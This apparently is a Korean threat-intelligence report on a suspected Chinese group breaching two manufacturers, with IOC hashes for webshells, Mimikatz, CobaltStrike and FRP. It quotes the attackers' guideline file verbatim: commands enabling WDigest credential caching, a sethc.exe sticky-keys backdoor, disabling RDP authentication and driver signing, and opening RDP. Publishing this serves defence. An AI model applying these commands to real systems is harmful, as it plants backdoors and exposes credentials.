최근 SQL 서버나 IIS 웹서버와 같이 외부에서 접근 가능한 취약한 서버를 대상으로 공격하는 침해 사례가 빈번히 확인되고 있다.
이번 사례에서 확인된 피해 기업은 총 2곳으로 반도체 업체와 AI를 활용한 스마트 제조업체이다. 해킹 공격을 수행한 공격 그룹에서 해킹 도구의 사용법이 적힌 중국어 텍스트 파일이 확인되어 샤오치잉과 Dalbit(달빗)과 같이 중국 해커 그룹으로 추정하고 있다.
중국 해커 그룹의 가이드 라인
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f reg add “HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe” /v “Debugger” /t REG_SZ /d “\”c:\windows\system32\cmd.exe\” /z” /f REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v UserAuthentication /t REG_DWORD /d 0 /f REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v SecurityLayer /t REG_DWORD /d 0 /f !! 禁止强制名,以管理的身行cmd 行以下命令 Win2012 Can: bcdedit.exe /set nointegritychecks on \Easy File Locker (!!!注意:只需要予Access限,其他都不需要,切切) 除1. REG delete “HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Easy file Locker” /f 除2:安目 除3: C:\Users\master\AppData\Roaming\Microsoft\Windows\Start Menu\Programs (快捷方式) C:/Users/Public/Documents/EFL/rule.ini 藏的定在此 Easy File Locker添加需要藏的文件,只予access限,可文件的藏。 cmd.exe /c reg add “HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /t REG_DWORD /v portnumber /d 3389 /f cmd.exe /c wmic RDTOGGLE WHERE ServerName=’%COMPUTERNAME%’ call SetAllowTSConnections 1 cmd.exe /c netsh advfirewall firewall add rule name=”RemoteDesktop_Allow” dir=in protocol=TCP action=allow localport=3389 remoteip=any 1.reg add “HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /t REG_DWORD /v portnumber /d 3389 /f \配置端口3389 2.wmic RDTOGGLE WHERE ServerName=’%COMPUTERNAME%’ call SetAllowTSConnections 1 (open terminal, 0 close) netsh advfirewall firewall add rule name=”RemoteDesktop_Allow” dir=in protocol=TCP action=allow localport=3389 remoteip=any 4.netsh advfirewall firewall show rule name=”RemoteDesktop_Allow” 5. netsh advfirewall firewall del rule name=”RemoteDesktop_Allow” reg add “HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe” /v “Debugger” /t REG_SZ /d “\”c:\windows\system32\cmd.exe\” /z” /f REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v UserAuthentication /t REG_DWORD /d 0 /f REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v SecurityLayer /t REG_DWORD /d 0 /f |
공격자 서버 및 유출 정보
현재 확인된 공격자의 서버는 아래와 같다.
FRP 관리 서버

공격자는 피해 기업 서버에 FRP를 설치하였다. 따라서 [그림 1]의 해당 페이지에는 FRP가 설치된 감염 PC와 공격자가 사용하는 프록시 서버 정보를 확인할 수 있다.
FRP를 이용한 공격 방법은 이전 블로그인 ‘Dalbit’ APT 그룹과 AhnLab TIP 서비스 ‘다양한 원격 제어 도구들을 악용하는 공격 사례 분석 보고서‘에서 자세히 기술하였다.


파일 서버

해당 서버에는 CobaltStrike, VPN, Remote Control 해킹 도구 등과 많은 로그 파일이 존재한다. 해당 로그 파일은 [그림 2]와 같이 번호로 이뤄진 디렉토리 안에 존재하며, 절취한 로그에는 자격 증명 정보와 네트워크 정보 그리고 기업 내부 자료로 추정되는 정보가 존재한다.


공격자 도구 & IOC
공격자가 사용한 도구 및 서버에서 확인된 도구는 아래와 같다.
웹쉘(WebShell)
Behinder
f8de2e99dc7523d2c83d1a48e844c5ff
77d507d30a155cf315f839db3bf507f7
Aspxspy
dd634ebfba56c1a898c4156ffdea146d
Godzilla
ed6ef17783c667c0c894e6cf7c71c54a
e5b626c4b172065005d04205b026e446
IceSword
a0301c680b257516090e336ca4e29167
자격 증명 탈취(Credential Access)
Mimikatz
825e6e194a9d5e12cbf109b7de07a244
6c9ad4e67032301a61a9897377d9cff8
bb8bdb3e8c92e97e2f63626bc3b254c4
29efd64dd3c7fe1e2b022b7ad73a1ba5
Impacket(Secretsdump)
a7b705e4fb473e7ce32a495b079017b2
네트워크 스캐닝(Network Scanning)
SharpHound
12c70eefa2edba8b420a6d00891c792b
c541c44f41d953899d5734dd1d3b1d78
PortScan
41b61b87cf54821a45e8cf2cbfc852f8
FScan
32421a007f28aacf869a46f714945ad0
지속성 유지(Persistence)
NSSM
beceae2fdc4f7729a93e94ac2ccd78cc
측면 이동(Lateral Movement)
PSexec
421116e8b522898f9d8e1651a8315705
Impacket(WMIExec)
e663e4b83089087d0a7989365b3513c4
RemCom
6983f7001de10f4d19fc2d794c3eb534
프록시 및 VPN 도구(Proxy and VPN Tool)
FRPC
7d9c233b8c9e3f0ea290d2b84593c842
2eead3e509a19002d80f48d431922f1e
FRPC INI(설정 파일)
61616e8948de1bf2b62a34854d655dea
e5273f435c8eab59bc5dbaa5ac11da7b
VPN Gate
e74130971e6f3c3caf56d862a39e750f
PulseSecure
8f9da1466cb5415a45a512341549b12e
원격 제어 도구(Remote Access Tool)
CobaltStrike
5e4fdc376f7dda3744bc331352bbe231
968931d2608f997866e07ce777b41636
2ad284b957ab28277fef534b3698c006
Ladon
006e7290fbae946551f07f6e0319d5de
b3b2c45aef41d94e7491d049d33c56c0
DameWare NT(Remote Control)
b10040dcd1583dadc4bf357eec22a18f
TeamViewer
b71d75f8f79e86add3fdece2c871e34c
ToDesk
7031441687a9548f1a7a08eb1e56f66b
ETC
note.txt(중국어 가이드 라인 파일 원본)
a0ac0624926bfbbf196050783dfbc019
공격자 C2 서버는 아직 연결이 가능한 상태로 피해 기업의 정보가 일부 노출되어 있다. 따라서 2차 피해를 막기 위해 공개하지 않는다.
연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.
Categories:악성코드 정보